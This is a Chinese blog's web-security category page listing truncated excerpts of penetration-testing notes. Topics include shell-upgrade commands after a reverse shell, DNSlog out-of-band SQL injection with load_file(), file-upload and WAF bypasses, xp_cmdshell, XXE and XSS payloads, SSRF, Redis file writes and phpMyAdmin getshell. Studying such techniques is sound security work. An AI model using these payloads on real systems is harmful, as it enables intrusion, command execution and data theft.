随笔分类 - Web安全
1
摘要:一、学习链接传送门 https://saucer-man.com/information_security/233.html 二、命令记录 1、python pth方式 python -c 'import pty; pty.spawn("/bin/bash")' 2、升级nc为完全交互 攻击机本地执
阅读全文
摘要:一、在线反弹shell生成网址 https://www.revshells.com/
阅读全文
摘要:零、php需要禁用的函数 phpinfo() 功能描述:输出 PHP 环境信息以及相关的模块、WEB 环境等信息。 危险等级:中 passthru() 功能描述:允许执行一个外部程序并回显输出,类似于 exec()。 危险等级:高 exec() 功能描述:允许执行一个外部程序(如 UNIX Shel
阅读全文
摘要:一、DNS 1、dnslog平台 http://www.dnslog.cn 2、sql注入 使用load_file()函数,前提条件:secure_file_priv为空 select load_file('\\(sql语句).xxxx.dnslog.cn\aaa') 3、命令执行 Windows:
阅读全文
摘要:一、常用文件上传绕过 1、黑名单上传 常见扩展名黑名单: asp|asa|cer|cdx|aspx|ashx|ascx|asax php|php2|php3|php4|php5|asis|htaccess htm|html|shtml|pwml|phtml|phtm|js|jsp vbs|asis|
阅读全文
摘要:一、数据库层特性 1、Mysql数据库bypass 1.参数和union之间 id=1\Nunion id=1.1union id=8e0union 2.union和select之间 union%0aselect union%09select union%0bselect union%0cselec
阅读全文
摘要:一、union注入 判断字段数量 order by 4 判断回显字段(先使用null进行填充) union select 1,null from dual 查询表名 第一行表:union select null,(select table_name from user_tables where ro
阅读全文
摘要:一、union注入 注意:前面需要闭合,后面需要注释符或者闭合 判断字段数量 order by 3 查看回显字段(这里先使用null进行填充(不能像mysql使用1,2,3,4进行数据填充),再使用'1'或者1判断数据的回显) union all select null,null,null from
阅读全文
摘要:一、判断漏洞是否存在 1.基本判断(排除法) 如:http://www.douban.com/***/service?image=http://www.baidu.com/img/bd_logo1.png 排除法一:直接右键图片,在新窗口打开图片,如果是浏览器上URL地址栏是http://www.b
阅读全文
摘要:一、漏洞的定义 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。 二、可能出现的地方 1.社交分享功能:获取超链接的标题等内容进行显示 2.转码服务:
阅读全文
摘要:一、测试是否有XXE漏洞 有回显 <?xml version = "1.0"?> <!DOCTYPE note [ <!ENTITY hacker "ESHLkangi"> ]> <name>&hacker;</name> <?xml version="1.0"?> <!DOCTYPE a [<!E
阅读全文
摘要:一、XXE漏洞相关基础知识 传送门:https://blog.csdn.net/xy_sunny/article/details/107175145 XXE(XML External Entity Injection) XML外部实体注入。 二、外部文档声明 1、语法 <!ENTITY 实体名称 S
阅读全文
摘要:一、XSS检测标签 <ScRipt>ALeRt("XSS");</sCRipT> <sc<script>ript>alert(/xss/)</script> <img src=""onerror="alert('xss')"> <img/src/onerror=alert(1)> <img/src=
阅读全文
摘要:一、元数据库 1、Mysql information_schema数据库; 其中的表有:information_schema.tables和information_schema.columns(存储了整个Mysql的表和整个Mysql的列值); 其中的information_schema.table
阅读全文
摘要:一、爆破当前数据库名 #coding:utf-8 import requests import time import string import sys headers = {"user-agent":"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5
阅读全文
摘要:一、Windows 1、Redis主从同步写数据 工具下载地址: https://github.com/r35tart/RedisWriteFile 执行如下命令: python2 RedisWriteFile.py --rhost=目标ip --rport=目标端口 --lhost=本机ip --
阅读全文
摘要:一、sql server版本说明 05以下系统权限为system 08以上系统权限就不是system了,看到好几种,比较多的是network service 二、Sql Server危险的存储过程 这里使用sqlmap --os-shell命令也行 1、开启xp_cmdshell存储过程 EXEC
阅读全文
摘要:一、phpmyadmin getshell 1、写文件getshell a、mysql账户权限 mysql账户需要有文件操作的权限 select * from mysql.user where user='test' and host='127.0.0.1'; b、mysql数据库的权限 在 MyS
阅读全文
摘要:1.前言 前面述说了Mysql渗透时用的基础知识后,本章内容述说Mysql注入时所用的语法知识 2.如何判断是否有注入点 直接使用awvs扫描器或者xray被动扫描,手工的话使用'和and 1=1判断吧 3.Mysql注入语句 查表名 第一种:select group_concat(table_na
阅读全文
摘要:1.Mysql基础知识 Mysql的元数据库:information_schema(里面存储了mysql服务器的数据库名、表名和字段名) 元数据库常见的表: information_schema.tables:存储了所有的表名 information_schema.columns:存储了所有的列名
阅读全文
1